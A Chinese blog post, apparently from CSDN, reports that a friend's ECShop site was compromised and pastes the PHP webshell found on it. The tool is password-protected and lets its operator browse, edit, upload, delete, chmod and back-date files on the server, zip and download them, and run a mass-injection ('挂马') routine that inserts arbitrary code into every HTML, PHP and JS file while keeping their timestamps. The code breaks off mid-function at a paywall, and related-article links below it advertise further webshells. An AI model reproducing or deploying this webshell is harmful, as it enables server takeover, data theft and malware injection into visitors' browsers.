ecshop被加入了黑链

最新推荐文章于 2022-11-07 15:29:16 发布
最新推荐文章于 2022-11-07 15:29:16 发布
阅读量1.1w 收藏
点赞数
文章标签: php javascript 数据库 ViewUI

朋友一个ecshop网站被攻击了,查看代码如下:

<?php

$password = "1";//设置密码

error_reporting(E_ERROR);
header("content-Type: text/html; charset=gb2312");
set_time_limit(0);

function Root_GP(&$array)
{
	while(list($key,$var) = each($array))
	{
		if((strtoupper($key) != $key || ''.intval($key) == "$key") && $key != 'argc' && $key != 'argv')
		{
			if(is_string($var)) $array[$key] = stripslashes($var);
			if(is_array($var)) $array[$key] = Root_GP($var);  
		}
	}
	return $array;
}

function Root_CSS()
{
printEND
style type="text/css">
	*{padding:0; margin:0;}
	body{background:threedface;font-family:"Verdana", "Tahoma", "宋体",sans-serif; font-size:13px;margin-top:3px;margin-bottom:3px;table-layout:fixed;word-break:break-all;}
	a{color:#000000;text-decoration:none;}
	a:hover{background:#BBBBBB;}
	table{color:#000000;font-family:"Verdana", "Tahoma", "宋体",sans-serif;font-size:13px;border:1px solid #999999;}
	td{background:#F9F6F4;}
	.toptd{background:threedface; width:310px; border-color:#FFFFFF #999999 #999999 #FFFFFF; border-style:solid;border-width:1px;}
	.msgbox{background:#FFFFE0;color:#FF0000;height:25px;font-size:12px;border:1px solid #999999;text-align:center;padding:3px;clear:both;}
	.actall{background:#F9F6F4;font-size:14px;border:1px solid #999999;padding:2px;margin-top:3px;margin-bottom:3px;clear:both;}
/style>\n
END;
return false;
}

//文件管理
class packdir
{
	var $out = '';
	var $datasec      = array();
	var $ctrl_dir     = array();
	var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
	var $old_offset   = 0;
	function packdir($array)
	{
		if(@function_exists('gzcompress'))
		{
			for($n = 0;$n  count($array);$n++)
			{
				$array[$n] = urldecode($array[$n]);
				$fp = @fopen($array[$n], 'r');
				$filecode = @fread($fp, @filesize($array[$n]));
				@fclose($fp);
				$this -> filezip($filecode,basename($array[$n]));
			}
			@closedir($zhizhen);
			$this->out = $this->packfile();
			return true;
		}
		return false;
	}
	function at($atunix = 0)
	{
		$unixarr = ($atunix == 0) ? getdate() : getdate($atunix);
		if ($unixarr['year']  1980)
		{
			$unixarr['year']    = 1980;
			$unixarr['mon']     = 1;
			$unixarr['mday']    = 1;
			$unixarr['hours']   = 0;
			$unixarr['minutes'] = 0;
			$unixarr['seconds'] = 0;
		} 
		return (($unixarr['year'] - 1980)  25) | ($unixarr['mon']  21) | ($unixarr['mday']  16) | ($unixarr['hours']  11) | ($unixarr['minutes']  5) | ($unixarr['seconds'] >> 1);
	}
	function filezip($data, $name, $time = 0)
	{
		$name = str_replace('\\', '/', $name);
		$dtime = dechex($this->at($time));
		$hexdtime	= '\x'.$dtime[6].$dtime[7].'\x'.$dtime[4].$dtime[5].'\x'.$dtime[2].$dtime[3].'\x'.$dtime[0].$dtime[1];
		eval('$hexdtime = "' . $hexdtime . '";');
		$fr	= "\x50\x4b\x03\x04";
		$fr	.= "\x14\x00";
		$fr	.= "\x00\x00";
		$fr	.= "\x08\x00";
		$fr	.= $hexdtime;
		$unc_len = strlen($data);
		$crc = crc32($data);
		$zdata = gzcompress($data);
		$c_len = strlen($zdata);
		$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
		$fr .= pack('V', $crc);
		$fr .= pack('V', $c_len);
		$fr .= pack('V', $unc_len);
		$fr .= pack('v', strlen($name));
		$fr .= pack('v', 0);
		$fr .= $name;
		$fr .= $zdata;
		$fr .= pack('V', $crc);
		$fr .= pack('V', $c_len);
		$fr .= pack('V', $unc_len);
		$this -> datasec[] = $fr;
		$new_offset = strlen(implode('', $this->datasec));
		$cdrec = "\x50\x4b\x01\x02";
		$cdrec .= "\x00\x00";
		$cdrec .= "\x14\x00";
		$cdrec .= "\x00\x00";
		$cdrec .= "\x08\x00";
		$cdrec .= $hexdtime;
		$cdrec .= pack('V', $crc);
		$cdrec .= pack('V', $c_len);
		$cdrec .= pack('V', $unc_len);
		$cdrec .= pack('v', strlen($name) );
		$cdrec .= pack('v', 0 );
		$cdrec .= pack('v', 0 );
		$cdrec .= pack('v', 0 );
		$cdrec .= pack('v', 0 );
		$cdrec .= pack('V', 32 );
		$cdrec .= pack('V', $this -> old_offset );
		$this -> old_offset = $new_offset;
		$cdrec .= $name;
		$this -> ctrl_dir[] = $cdrec;
	}
	function packfile()
	{
		$data    = implode('', $this -> datasec);
		$ctrldir = implode('', $this -> ctrl_dir);
		return $data.$ctrldir.$this -> eof_ctrl_dir.pack('v', sizeof($this -> ctrl_dir)).pack('v', sizeof($this -> ctrl_dir)).pack('V', strlen($ctrldir)).pack('V', strlen($data))."\x00\x00";
	}
}

function File_Str($string)
{
	return str_replace('//','/',str_replace('\\','/',$string));
}

function File_Size($size)
{
	if($size > 1073741824) $size = round($size / 1073741824 * 100) / 100 . ' G';
	elseif($size > 1048576) $size = round($size / 1048576 * 100) / 100 . ' M';
	elseif($size > 1024) $size = round($size / 1024 * 100) / 100 . ' K';
	else $size = $size . ' B';
	return $size;
}

function File_Mode()
{
	$RealPath = realpath('./');
	$SelfPath = $_SERVER['PHP_SELF'];
	$SelfPath = substr($SelfPath, 0, strrpos($SelfPath,'/'));
	return File_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath)));
}

function File_Read($filename)
{
	$handle = @fopen($filename,"rb");
	$filecode = @fread($handle,@filesize($filename));
	@fclose($handle);
	return $filecode;
}

function File_Write($filename,$filecode,$filemode)
{
	$key = true;
	$handle = @fopen($filename,$filemode);
	if(!@fwrite($handle,$filecode))
	{
		@chmod($filename,0666);
		$key = @fwrite($handle,$filecode) ? true : false;
	}
	@fclose($handle);
	return $key;
}

function File_Up($filea,$fileb)
{
	$key = @copy($filea,$fileb) ? true : false;
	if(!$key) $key = @move_uploaded_file($filea,$fileb) ? true : false;
	return $key;
}

function File_Down($filename)
{
	if(!file_exists($filename)) return false;
	$filedown = basename($filename);
	$array = explode('.', $filedown);
	$arrayend = array_pop($array);
	header('Content-type: application/x-'.$arrayend);
	header('Content-Disposition: attachment; filename='.$filedown);
	header('Content-Length: '.filesize($filename));
	@readfile($filename);
	exit;
}

function File_Deltree($deldir)
{
	if(($mydir = @opendir($deldir)) == NULL) return false;	
	while(false !== ($file = @readdir($mydir)))
	{
		$name = File_Str($deldir.'/'.$file);
		if((is_dir($name)) && ($file!='.') && ($file!='..')){@chmod($name,0777);File_Deltree($name);}
		if(is_file($name)){@chmod($name,0777);@unlink($name);}
	} 
	@closedir($mydir);
	@chmod($deldir,0777);
	return @rmdir($deldir) ? true : false;
}

function File_Act($array,$actall,$inver)
{
	if(($count = count($array)) == 0) return '请选择文件';
	if($actall == 'e')
	{
		$zip = new packdir;
		if($zip->packdir($array)){$spider = $zip->out;header("Content-type: application/unknown");header("Accept-Ranges: bytes");header("Content-length: ".strlen($spider));header("Content-disposition: attachment; filename=".$inver.";");echo $spider;exit;}
		return '打包所选文件失败';
	}
	$i = 0;
	while($i  $count)
	{
		$array[$i] = urldecode($array[$i]);
		switch($actall)
		{
			case "a" : $inver = urldecode($inver); if(!is_dir($inver)) return '路径错误'; $filename = array_pop(explode('/',$array[$i])); @copy($array[$i],File_Str($inver.'/'.$filename)); $msg = '复制到'.$inver.'目录'; break;
			case "b" : if(!@unlink($array[$i])){@chmod($filename,0666);@unlink($array[$i]);} $msg = '删除'; break;
			case "c" : if(!eregi("^[0-7]{4}$",$inver)) return '属性值错误'; $newmode = base_convert($inver,8,10); @chmod($array[$i],$newmode); $msg = '属性修改为'.$inver; break;
			case "d" : @touch($array[$i],strtotime($inver)); $msg = '修改时间为'.$inver; break;
		}
		$i++;
	}
	return '所选文件'.$msg.'完毕';
}

function File_Edit($filepath,$filename,$dim = '')
{
	$THIS_DIR = urlencode($filepath);
	$THIS_FILE = File_Str($filepath.'/'.$filename);
	if(file_exists($THIS_FILE)){$FILE_TIME = @date('Y-m-d H:i:s',filemtime($THIS_FILE));$FILE_CODE = htmlspecialchars(File_Read($THIS_FILE));}
	else {$FILE_TIME = @date('Y-m-d H:i:s',time());$FILE_CODE = '';}
printEND
script language="javascript">
var NS4 = (document.layers);
var IE4 = (document.all);
var win = this;
var n = 0;
function search(str){
	var txt, i, found;
	if(str == "")return false;
	if(NS4){
		if(!win.find(str)) while(win.find(str, false, true)) n++; else n++;
		if(n == 0) alert(str + " ... Not-Find")
	}
	if(IE4){
		txt = win.document.body.createTextRange();
		for(i = 0; i = n && (found = txt.findText(str)) != false; i++){
			txt.moveStart("character", 1);
			txt.moveEnd("textedit")
		}
		if(found){txt.moveStart("character", -1);txt.findText(str);txt.select();txt.scrollIntoView();n++}
		else{if (n > 0){n = 0;search(str)}else alert(str + "... Not-Find")}
	}
	return false
}
function CheckDate(){
	var re = document.getElementById('mtime').value;
	var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/; 
	var r = re.match(reg);
	if(r==null){alert('日期格式不正确!格式:yyyy-mm-dd hh:mm:ss');return false;}
	else{document.getElementById('editor').submit();}
}
/script>
div class="actall">查找内容: input name="searchs" type="text" value="{$dim}" style="width:500px;">
input type="button" value="查找" οnclick="search(searchs.value)">/div>
form method="POST" id="editor" action="?s=a&p={$THIS_DIR}">
div class="actall">input type="text" name="pfn" value="{$THIS_FILE}" style="width:750px;">/div>
div class="actall">textarea name="pfc" id style="width:750px;height:380px;">{$FILE_CODE}/textarea>/div>
div class="actall">文件修改时间 input type="text" name="mtime" id="mtime" value="{$FILE_TIME}" style="width:150px;">/div>
div class="actall">input type="button" value="保存" οnclick="CheckDate();" style="width:80px;">
input type="button" value="返回" οnclick="window.location='?s=a&p={$THIS_DIR}';" style="width:80px;">/div>
/form>
END;
}

function File_Soup($p)
{
	$THIS_DIR = urlencode($p);
	$UP_SIZE = get_cfg_var('upload_max_filesize');
	$MSG_BOX = '单个附件允许大小:'.$UP_SIZE.', 改名格式(new.php),如为空,则保持原文件名.';
	if(!empty($_POST['updir']))
	{
		if(count($_FILES['soup']) >= 1)
		{
			$i = 0;
			foreach ($_FILES['soup']['error'] as $key => $error)
			{
				if ($error == UPLOAD_ERR_OK)
				{
					$souptmp = $_FILES['soup']['tmp_name'][$key];
					if(!empty($_POST['reup'][$i]))$soupname = $_POST['reup'][$i]; else $soupname = $_FILES['soup']['name'][$key];
					$MSG[$i] = File_Up($souptmp,File_Str($_POST['updir'].'/'.$soupname)) ? $soupname.'上传成功' : $soupname.'上传失败';
				}
				$i++;
			}
		}
		else
		{
			$MSG_BOX = '请选择文件';
		}
	}
printEND
div class="msgbox">{$MSG_BOX}/div>
form method="POST" id="editor" action="?s=q&p={$THIS_DIR}" enctype="multipart/form-data">
div class="actall">上传到目录: input type="text" name="updir" value="{$p}" style="width:531px;height:22px;">/div>
div class="actall">附件1 input type="file" name="soup[]" style="width:300px;height:22px;"> 改名 input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[0] /div>
div class="actall">附件2 input type="file" name="soup[]" style="width:300px;height:22px;"> 改名 input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[1] /div>
div class="actall">附件3 input type="file" name="soup[]" style="width:300px;height:22px;"> 改名 input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[2] /div>
div class="actall">附件4 input type="file" name="soup[]" style="width:300px;height:22px;"> 改名 input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[3] /div>
div class="actall">附件5 input type="file" name="soup[]" style="width:300px;height:22px;"> 改名 input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[4] /div>
div class="actall">附件6 input type="file" name="soup[]" style="width:300px;height:22px;"> 改名 input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[5] /div>
div class="actall">附件7 input type="file" name="soup[]" style="width:300px;height:22px;"> 改名 input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[6] /div>
div class="actall">附件8 input type="file" name="soup[]" style="width:300px;height:22px;"> 改名 input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[7] /div>
div class="actall">input type="submit" value="上传" style="width:80px;"> input type="button" value="返回" οnclick="window.location='?s=a&p={$THIS_DIR}';" style="width:80px;">/div>
/form>
END;
}

function File_a($p)
{
	if(!$_SERVER['SERVER_NAME']) $GETURL = ''; else $GETURL = 'http://'.$_SERVER['SERVER_NAME'].'/';
	$MSG_BOX = '等待消息队列';
	$UP_DIR = urlencode(File_Str($p.'/..'));
	$REAL_DIR = File_Str(realpath($p));
	$FILE_DIR = File_Str(dirname(__FILE__));
	$ROOT_DIR = File_Mode();
	$THIS_DIR = urlencode(File_Str($REAL_DIR));
	$NUM_D = 0;
	$NUM_F = 0;
	if(!empty($_POST['pfn'])){$intime = @strtotime($_POST['mtime']);$MSG_BOX = File_Write($_POST['pfn'],$_POST['pfc'],'wb') ? '编辑文件 '.$_POST['pfn'].' 成功' : '编辑文件 '.$_POST['pfn'].' 失败';@touch($_POST['pfn'],$intime);}
	if(!empty($_FILES['ufp']['name'])){if($_POST['ufn'] != '') $upfilename = $_POST['ufn']; else $upfilename = $_FILES['ufp']['name'];$MSG_BOX = File_Up($_FILES['ufp']['tmp_name'],File_Str($REAL_DIR.'/'.$upfilename)) ? '上传文件 '.$upfilename.' 成功' : '上传文件 '.$upfilename.' 失败';}
	if(!empty($_POST['actall'])){$MSG_BOX = File_Act($_POST['files'],$_POST['actall'],$_POST['inver']);}
	if(isset($_GET['md'])){$modfile = File_Str($REAL_DIR.'/'.$_GET['mk']); if(!eregi("^[0-7]{4}$",$_GET['md'])) $MSG_BOX = '属性值错误'; else $MSG_BOX = @chmod($modfile,base_convert($_GET['md'],8,10)) ? '修改 '.$modfile.' 属性为 '.$_GET['md'].' 成功' : '修改 '.$modfile.' 属性为 '.$_GET['md'].' 失败';}
	if(isset($_GET['mn'])){$MSG_BOX = @rename(File_Str($REAL_DIR.'/'.$_GET['mn']),File_Str($REAL_DIR.'/'.$_GET['rn'])) ? '改名 '.$_GET['mn'].' 为 '.$_GET['rn'].' 成功' : '改名 '.$_GET['mn'].' 为 '.$_GET['rn'].' 失败';}
	if(isset($_GET['dn'])){$MSG_BOX = @mkdir(File_Str($REAL_DIR.'/'.$_GET['dn']),0777) ? '创建目录 '.$_GET['dn'].' 成功' : '创建目录 '.$_GET['dn'].' 失败';}
	if(isset($_GET['dd'])){$MSG_BOX = File_Deltree($_GET['dd']) ? '删除目录 '.$_GET['dd'].' 成功' : '删除目录 '.$_GET['dd'].' 失败';}
	if(isset($_GET['df'])){if(!File_Down($_GET['df'])) $MSG_BOX = '下载文件不存在';}
	Root_CSS();
printEND
script type="text/javascript">
	function Inputok(msg,gourl)
	{
		smsg = "当前文件:[" + msg + "]";
		re = prompt(smsg,unescape(msg));
		if(re)
		{
			var url = gourl + escape(re);
			window.location = url;
		}
	}
	function Delok(msg,gourl)
	{
		smsg = "确定要删除[" + unescape(msg) + "]吗?";
		if(confirm(smsg))
		{
			if(gourl == 'b')
			{
				document.getElementById('actall').value = escape(gourl);
				document.getElementById('fileall').submit();
			}
			else window.location = gourl;
		}
	}
	function CheckDate(msg,gourl)
	{
		smsg = "当前文件时间:[" + msg + "]";
		re = prompt(smsg,msg);
		if(re)
		{
			var url = gourl + re;
			var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/; 
			var r = re.match(reg);
			if(r==null){alert('日期格式不正确!格式:yyyy-mm-dd hh:mm:ss');return false;}
			else{document.getElementById('actall').value = gourl; document.getElementById('inver').value = re; document.getElementById('fileall').submit();}
		}
	}
	function CheckAll(form)
	{
		for(var i=0;iform.elements.length;i++)
		{
			var e = form.elements[i];
			if (e.name != 'chkall')
			e.checked = form.chkall.checked;
		}
	}
	function SubmitUrl(msg,txt,actid)
	{
		re = prompt(msg,unescape(txt));
		if(re)
		{
			document.getElementById('actall').value = actid;
			document.getElementById('inver').value = escape(re);
			document.getElementById('fileall').submit();
		}
	}
/script>
	div id="msgbox" class="msgbox">{$MSG_BOX}/div>
	div class="actall" style="text-align:center;padding:3px;">
	form method="GET">input type="hidden" id="s" name="s" value="a">
	input type="text" name="p" value="{$REAL_DIR}" style="width:550px;height:22px;">
	select οnchange="location.href='?s=a&p='+options[selectedIndex].value">
	option>---特殊目录---/option>
	option value="{$ROOT_DIR}"> 网站根目录 /option>
	option value="{$FILE_DIR}"> 本程序目录 /option>
	option value="C:/Documents and Settings/All Users/「开始」菜单/程序/启动"> 所有组启动项 /option>
	option value="C:/Documents and Settings/All Users/Start Menu/Programs/Startup"> 英文启动项 /option>
	option value="C:/RECYCLER"> RECYCLER /option>
	option value="C:/Program Files"> Program Files /option>
	/select> input type="submit" value="转到" style="width:50px;">/form>
	div style="margin-top:3px;">/div>
	form method="POST" action="?s=a&p={$THIS_DIR}" enctype="multipart/form-data">
	input type="button" value="新建文件" οnclick="Inputok('newfile.php','?s=p&fp={$THIS_DIR}&fn=');">
	input type="button" value="新建目录" οnclick="Inputok('newdir','?s=a&p={$THIS_DIR}&dn=');"> 
	input type="button" value="批量上传" οnclick="window.location='?s=q&p={$REAL_DIR}';"> 
	input type="file" name="ufp" style="width:300px;height:22px;">
	input type="text" name="ufn" style="width:121px;height:22px;">
	input type="submit" value="上传" style="width:50px;">
	/form>
	/div>
	form method="POST" name="fileall" id="fileall" action="?s=a&p={$THIS_DIR}">
	table border="0">tr>
	td class="toptd" style="width:450px;"> a href="?s=a&p={$UP_DIR}">b>上级目录/b>/a> /td>
	td class="toptd" style="width:80px;"> 操作 /td>
	td class="toptd" style="width:48px;"> 属性 /td>
	td class="toptd" style="width:173px;"> 修改时间 /td>
	td class="toptd" style="width:75px;"> 大小 /td>/tr>
END;
	if(($h_d = @opendir($p)) == NULL) return false;
	while(false !== ($Filename = @readdir($h_d)))
	{
		if($Filename == '.' or $Filename == '..') continue;
		$Filepath = File_Str($REAL_DIR.'/'.$Filename);
		if(is_dir($Filepath))
		{
			$Fileperm = substr(base_convert(@fileperms($Filepath),10,8),-4);
			$Filetime = @date('Y-m-d H:i:s',@filemtime($Filepath));
			$Filepath = urlencode($Filepath);
			echo "\r\n".' tr>td> a href="?s=a&p='.$Filepath.'">font face="wingdings" size="3">0/font>b> '.$Filename.' /b>/a> /td> ';
			$Filename = urlencode($Filename);
			echo ' td> a href="#" οnclick="Delok(\''.$Filename.'\',\'?s=a&p='.$THIS_DIR.'&dd='.$Filename.'\');return false;"> 删除 /a> ';
			echo ' a href="#" οnclick="Inputok(\''.$Filename.'\',\'?s=a&p='.$THIS_DIR.'&mn='.$Filename.'&rn=\');return false;"> 改名 /a> /td> ';
			echo ' td> a href="#" οnclick="Inputok(\''.$Fileperm.'\',\'?s=a&p='.$THIS_DIR.'&mk='.$Filename.'&md=\');return false;"> '.$Fileperm.' /a> /td> ';
			echo ' td>'.$Filetime.'/td> ';
			echo ' td> /td> /tr>'."\r\n";
			$NUM_D++;
		}
	}
	@rewinddir($h_d);
	while(false !== ($Filename = @readdir($h_d)))
	{
		if($Filename == '.' or $Filename == '..') continue;
		$Filepath = File_Str($REAL_DIR.'/'.$Filename);
		if(!is_dir($Filepath))
		{
			$Fileurls = str_replace(File_Str($ROOT_DIR.'/'),$GETURL,$Filepath);
			$Fileperm = substr(base_convert(@fileperms($Filepath),10,8),-4);
			$Filetime = @date('Y-m-d H:i:s',@filemtime($Filepath));
			$Filesize = File_Size(@filesize($Filepath));
			if($Filepath == File_Str(__FILE__)) $fname = 'font color="#8B0000">'.$Filename.'/font>'; else $fname = $Filename;
			echo "\r\n".' tr>td> input type="checkbox" name="files[]" value="'.urlencode($Filepath).'">a target="_blank" href="'.$Fileurls.'">'.$fname.'/a> /td>';
			$Filepath = urlencode($Filepath);
			$Filename = urlencode($Filename);
			echo ' td> a href="?s=p&fp='.$THIS_DIR.'&fn='.$Filename.'"> 编辑 /a> ';
			echo ' a href="#" οnclick="Inputok(\''.$Filename.'\',\'?s=a&p='.$THIS_DIR.'&mn='.$Filename.'&rn=\');return false;"> 改名 /a> /td>';
			echo ' td>'.$Fileperm.'/td> ';
			echo ' td>'.$Filetime.'/td> ';
			echo ' td align="right"> a href="?s=a&df='.$Filepath.'">'.$Filesize.'/a> /td>/tr> '."\r\n";
			$NUM_F++;
		}
	}
	@closedir($h_d);
	if(!$Filetime) $Filetime = '2009-01-01 00:00:00';
printEND
/table>
div class="actall"> input type="hidden" id="actall" name="actall" value="undefined"> 
input type="hidden" id="inver" name="inver" value="undefined"> 
input name="chkall" value="on" type="checkbox" οnclick="CheckAll(this.form);"> 
input type="button" value="复制" οnclick="SubmitUrl('复制所选文件到路径: ','{$THIS_DIR}','a');return false;"> 
input type="button" value="删除" οnclick="Delok('所选文件','b');return false;"> 
input type="button" value="属性" οnclick="SubmitUrl('修改所选文件属性值为: ','0666','c');return false;"> 
input type="button" value="时间" οnclick="CheckDate('{$Filetime}','d');return false;"> 
input type="button" value="打包" οnclick="SubmitUrl('打包并下载所选文件下载名为: ','spider.tar.gz','e');return false;"> 
目录({$NUM_D}) / 文件({$NUM_F})/div> 
/form> 
END;
	return true;
}

//批量挂马
function Guama_Pass($length)
{
	$possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
	$str = "";
	while(strlen($str)  $length) $str .= substr($possible,(rand() % strlen($possible)),1);
	return $str;
}

function Guama_Make($codea,$codeb,$codec)
{
	return str_replace($codea,Guama_Pass($codeb),$codec);
}

function Guama_Auto($gp,$gt,$gl,$gc,$gm,$gf,$gi,$gk,$gd,$gb)
{
	if(($h_d = @opendir($gp)) == NULL) return false;
	if($gm > 12) return false;
	while(false !== ($Filename = @readdir($h_d)))
	{
		if($Filename == '.' || $Filename == '..') continue;
		if($gl != ''){if(eregi($gl,$Filename)) continue;}
		$Filepath = File_Str($gp.'/'.$Filename);
		if(is_dir($Filepath) && $gb) Guama_Auto($Filepath,$gt,$gl,$gc,$gm,$gf,$gi,$gk,$gd,$gb);
		if(eregi($gt,$Filename))
		{
			$fc = File_Read($Filepath);
			if(($gk != '') && (stristr($fc,chop($gk)))) continue;
			if(($gf != '') && ($gm != 0)) $gcm = Guama_Make($gf,$gm,$gc); else $gcm = $gc;
			if($gd) $ftime = @filemtime($Filepath);
			if($gi == 'a'){if(!stristr($fc,'/head>')) continue; $fcm = str_replace('/head>',"\r\n".$gcm."\r\n".'/head>',$fc); $fcm = str_replace('/HEAD>',"\r\n".$gcm."\r\n".'/HEAD>',$fcm);}
			if($gi == 'b') $fcm = $gcm."\r\n".$fc;
			if($gi == 'c') $fcm = $fc."\r\n".$gcm;
			echo File_Write($Filepath,$fcm,'wb') ? 'font color="#006600">成功:/font>'.$Filepath.' br>'."\r\n" : 'font color="#FF0000">失败:/font>'.$Filepath.' br>'."\r\n";
			if($gd) @touch($Filepath,$ftime);
			ob_flush();
			flush();
		}
	}
	@closedir($h_d);
	return true;
}

function Guama_b()
{
	if((!empty($_POST['gp'])) && (!empty($_POST['gt'])) && (!empty($_POST['gc'])))
	{
		echo 'div class="actall">';
		$_POST['gt'] = str_replace('.','\\.',$_POST['gt']);
		if($_POST['inout'] == 'a') $_POST['gl'] = str_replace('.','\\.',$_POST['gl']); else $_POST['gl'] = '';
		if(stristr($_POST['gc'],'[-') && stristr($_POST['gc'],'-]'))
		{
			$temp = explode('[-',$_POST['gc']);
			$gk = $temp[0];
			preg_match_all("/\[\-([^~]*?)\-\]/i",$_POST['gc'],$nc);
			if(!eregi("^[0-9]{1,2}$",$nc[1][0])){echo 'a href="#" οnclick="history.back();">异常终止/a>'; return false;}
			$gm = (int)$nc[1][0];
			$gf = $nc[0][0];
		}
		else
		{
			$gk = $_POST['gc'];
			$gm = 0;
			$gf = '';
		}
		if(!isset($_POST['gx'])) $gk = '';
		$gd = isset($_POST['gd']) ? true : false;
		$gb = ($_POST['gb'] == 'a') ? true : false;
		echo Guama_Auto($_POST['gp'],$_POST['gt'],$_POST['gl'],$_POST['gc'],$gm,$gf,$_POST['gi'],$gk,$gd,$gb) ? 'a href="#" οnclick="history.back();">挂马完毕/a>' : 'a href="#" οnclick="history.back();">异常终止/a>';
		echo '/div>';
		return false;
	}
	$FILE_DIR = File_Str(dirname(__FILE__));
	$ROOT_DIR = File_Mode();
printEND
script language="javascript">
function Fulll(i)
{
	if(i==0) return false;
  Str = new Array(5);
  if(i = 2){Str[1] = "{$ROOT_DIR}";Str[2] = "{$FILE_DIR}";sform.gp.value = Str[i];}
  else{Str[3] = ".htm|.html|.shtml";Str[4] = ".htm|.html|.shtml|.asp|.php|.jsp|.cgi|.aspx|.do";Str[5] = ".js";sform.gt.value = Str[i];}
  return true;
}
function autorun()
{
	if(document.getElementById('gp').value == ''){alert('挂马路径不能为空');return fal
最低0.47元/天 解锁文章
weixin_33691700
关注
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
php大马
06-24
数据库和web服务器不在同一台电脑数据库和web服务器不在同一台电脑数据库和web服务器不在同一台电脑
PHP运维管理
linking530的专栏
04-03 2万+
<?php $password = "osyunwei";//设置密码 error_reporting(E_ERROR); header("content-Type: text/html; charset=gb2312"); set_time_limit(0); function Root_GP(&$array) { while(list($key,$var) = each($array)
PHP大马
12-24
php 木马的分析(加密破解) - 分析可以知道,此木马经过了base64进行了编码,然后进行压缩。虽然做了相关的保密措施,可是php代码要执行,其最终要生成php源代码,
php大马(webshell)
05-26
增加了到达部分敏感目录的快捷链接。除了登录密码部分,其它所有代码已经过base64_decode加密(免杀性能好),请自行修改$admin['pass']处的登录密码。由于此php大马的功能过于强大,请勿用于非法用途。
PHP大马(个人比较喜欢)
07-18
PHP大马
网站被挂黑链
冰雪的专栏
12-20 1854
黑客入侵你的网站管理后台,或者破解你的网站FTP帐号后,在你们网站网页(一般是首页)中加入隐藏的外链,肉眼看不到, 但是搜索引擎通过源文件可以看到的;这就是黑链!一般情况下,黑链被挂在首页的最多,站长需要经常查看网站的源代码, 点击网站文字位置,右键,有一个“查看源文件”的选项,点开即可查看。黑链不及时处理,网站很容易被K或者被降权; 黑链是现在做黑帽SEO最常见的方法之一,现在黑链市场非常
网站被黑检测-网页挂马及暗链检测
java_yuan12138的博客
10-23 9689
网页挂马及暗链检测 &nbsp;什么是网页挂马&nbsp;网页挂马是指恶意攻击者攻击WEB网站后,在网页中嵌入一段代码或脚本,用于自动下载带有特定目的木马程序,而恶意攻击者实施恶意代码或脚本植入的行为通常称为“挂马”。&nbsp;&nbsp;什么是SEO暗链&nbsp;SEO暗链是SEO黑帽手法中相当普遍的一种手段。笼统地说,它就是...
ECSHOP数据表结构完整仔细说明教程
weixin_37678117的博客
07-24 5990
s_account_log //用户账目日志表 字段 类型 Null  默认 注释 log_id mediumint(8)   否   自增ID号 user_id   ...
php大马,phpshell
09-16
php大马 phpshell phpphp木马 php 管理php网站的好东西,php密码admin,有文件管理,执行命令,扫描端口,Mysql管理等功能
PHP大马-php_mof SHELL.rar
11-17
nc反弹还需要再测试 PHP大马-php_mof SHELL.rar
比较不错的php大马
12-04
比较不错的php大马
php大马,一句话
05-18
php最新大马,支持php7
php免杀大马
07-12
常用的php大马,可提权反弹。 常用提权大马常用的php大马,可提权反弹。 常用提权大马
CSDN前1000名博主
热门推荐
无知人生,记录点滴
05-26 8万+
博主 简介 stpeace 排名:1 原创:2166 粉丝:7180 积分:181660 等级:10stpeace的专栏中国本博客供大家交流,欢迎各抒己见。博文中的内容禁止用 yuanmeng001 排名:2 原创:5286 粉丝:10660 积分:170616 等级:10袁萌专栏无穷小微积分倡导者–北大教授null老师 yjclsx 排名:3 原创:162...
软件测试实战,web测试电子商务网站测试(详细总结)及拿即用
Ces222的博客
11-07 782
功能方面,需要检查所有的页面,如主页面(包括特色产品、特价产品展示、登录详情、搜索功能)产品详情页、分类页、下单、支付网关一切都要进行测试。当你购买或增加数量时,检查购物车是否得到更新。检查特殊优惠券和优惠是否应用于正确的订单,你看到的折扣价格是否显示。考虑到产品的变化数量。检查过滤选项是否准确工作。注册时,应进行超级验证。只有新用户才能注册。购物篮中添加了一个产品,那么他们之前登录时的愿望清单部分应该被保存,并在下次登录时显示出来。…接下来我们就来细分了解。
面试题总结(测试理论)
weixin_47956764的博客
04-06 2796
操作系统之Linux 1、杀掉tomcat进程 ps -ef |grep tomcat kill -9 pid 2、启动http服务 service httpd start 3、查看可用内存,磁盘大小和CPU使用率的命令 free -m df -h top 4、给a.txt文件的属主和其他用户分别增加写和执行权限 chmod u+w,o+x a.txt 5、实时查看a.log日志文件的信息 tail -f a.log 6、查看8888端口是否被占用 netstat -an |grep 888
PHP大马非常好用
03-30
PHP大马非常好用PHP大马非常好用PHP大马非常好用PHP大马非常好用PHP大马非常好用
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值